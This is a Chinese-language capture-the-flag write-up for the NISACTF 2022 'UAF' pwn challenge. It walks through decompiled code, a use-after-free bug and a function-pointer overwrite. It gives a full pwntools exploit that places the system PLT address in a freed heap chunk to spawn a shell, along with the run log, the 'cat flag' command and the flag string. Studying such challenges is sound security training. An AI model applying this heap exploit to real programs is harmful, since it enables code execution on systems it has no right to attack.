[NISACTF 2022]UAF
解题过程
信息搜集
file pwnpwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=85bd87e16a35c0c05064a1a0938f6115b8b3b2be, not stripped分析
- Linux32位小端序
查看源码
int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { _DWORD v3[4]; // [esp+8h] [ebp-10h] BYREF v3[1] = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); while ( 1 ) { while ( 1 ) { puts("1.create"); puts("2.edit"); puts("3.delete"); puts("4.show"); putchar(58); __isoc99_scanf("%d", v3); if ( v3[0] != 2 ) break; edit(); } if ( v3[0] > 2 ) { if ( v3[0] == 3 ) { del(); } else if ( v3[0] == 4 ) { show(); } else { LABEL_13: puts("Invalid choice"); } } else { if ( v3[0] != 1 ) goto LABEL_13; create(); } } }int create() { int result; // eax int v1; // ebx char *v2; // eax printf("you are creating the %d page\n", i); result = i; if ( i >= 0 ) { result = i; if ( i <= 9 ) { v1 = i; (&page)[v1] = (char *)malloc(8u); if ( i ) { if ( i <= 0 || i > 9 ) { return puts("NO PAGE"); } else { puts("Good cretation!"); return ++i; } } else { v2 = page; *(_DWORD *)page = 1868654951; v2[4] = 0; *((_DWORD *)page + 1) = echo; puts("The init page"); return ++i; } } } return result; }unsigned int edit() { int v1; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); puts("Input page"); __isoc99_scanf("%d", &v1); if ( v1 <= 0 || v1 > i ) { puts("NO PAGE"); } else { puts("Input your strings"); __isoc99_scanf("%s", (&page)[v1]); } return __readgsdword(0x14u) ^ v2; }unsigned int del() { int v1; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); puts("Input page"); __isoc99_scanf("%d", &v1); if ( v1 < 0 || v1 > i ) puts("NO PAGE"); else free((&page)[v1]); return __readgsdword(0x14u) ^ v2; }unsigned int show() { int v1; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); puts("Input page"); __isoc99_scanf("%d", &v1); if ( v1 ) { if ( v1 <= 0 || v1 > i ) puts("NO PAGE"); else echo((&page)[v1]); } else { (*((void (__cdecl **)(char *))page + 1))(page); } return __readgsdword(0x14u) ^ v2; }分析
del函数free后没将指针指控,存在uaf漏洞可利用if ( v1 < 0 || v1 > i ) puts("NO PAGE"); else free((&page)[v1]); return __readgsdword(0x14u) ^ v2;show函数存在任意执行漏洞可利用,但只能利用index == 0的堆块if ( v1 ) { if ( v1 <= 0 || v1 > i ) puts("NO PAGE"); else echo((&page)[v1]); } else { (*((void (__cdecl **)(char *))page + 1))(page); } return __readgsdword(0x14u) ^ v2;- 我们选择先创建0,然后free掉0,再创建1覆盖0,通关给1写入4字节的
sh;\x00+四字节的p32(plt@system)来修改0的内容,进而show出0来执行我们的payload最终脚本
from pwn import * r = remote("node4.anna.nssctf.cn", 29483) elf = ELF("./pwn") r.sendline(b"1") # 0 malloc 8 # free 0 r.sendline(b"3") r.sendline(b"0") r.sendline(b"1") # 1->0 malloc 8 # edit 1->0 system("/bin/sh\x00") r.sendline(b"2") r.sendline(b"1") r.sendline(b"sh;\x00" + p32(elf.sym["system"])) # plt@system = 0x80484E0 # show 0 r.sendline(b"4") r.sendline(b"0") r.interactive()D:\Environment\python\python-3.13.0-amd64\python.exe D:\Work\test\testPython\src\com\probie\test01\Main.py [x] Opening connection to node4.anna.nssctf.cn on port 29483 [x] Opening connection to node4.anna.nssctf.cn on port 29483: Trying 1.14.71.254 [+] Opening connection to node4.anna.nssctf.cn on port 29483: Done [*] 'D:\\Work\\test\\testPython\\src\\com\\probie\\test01\\pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No [*] Switching to interactive mode 1.create 2.edit 3.delete 4.show :you are creating the 0 page The init page 1.create 2.edit 3.delete 4.show :Input page 1.create 2.edit 3.delete 4.show :you are creating the 1 page Good cretation! 1.create 2.edit 3.delete 4.show :Input page Input your strings 1.create 2.edit 3.delete 4.show :Input page ls bin dev flag lib lib32 lib64 pwn cat flag NSSCTF{b5138e1c-0692-499a-9b85-c9086911e2d4}得到:NSSCTF{b5138e1c-0692-499a-9b85-c9086911e2d4}
[NISACTF 2022]UAF
2026-01-09 03:24・By
probie
UAF堆DoubleFree
还没有人赞赏,快来当第一个赞赏的人吧!
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论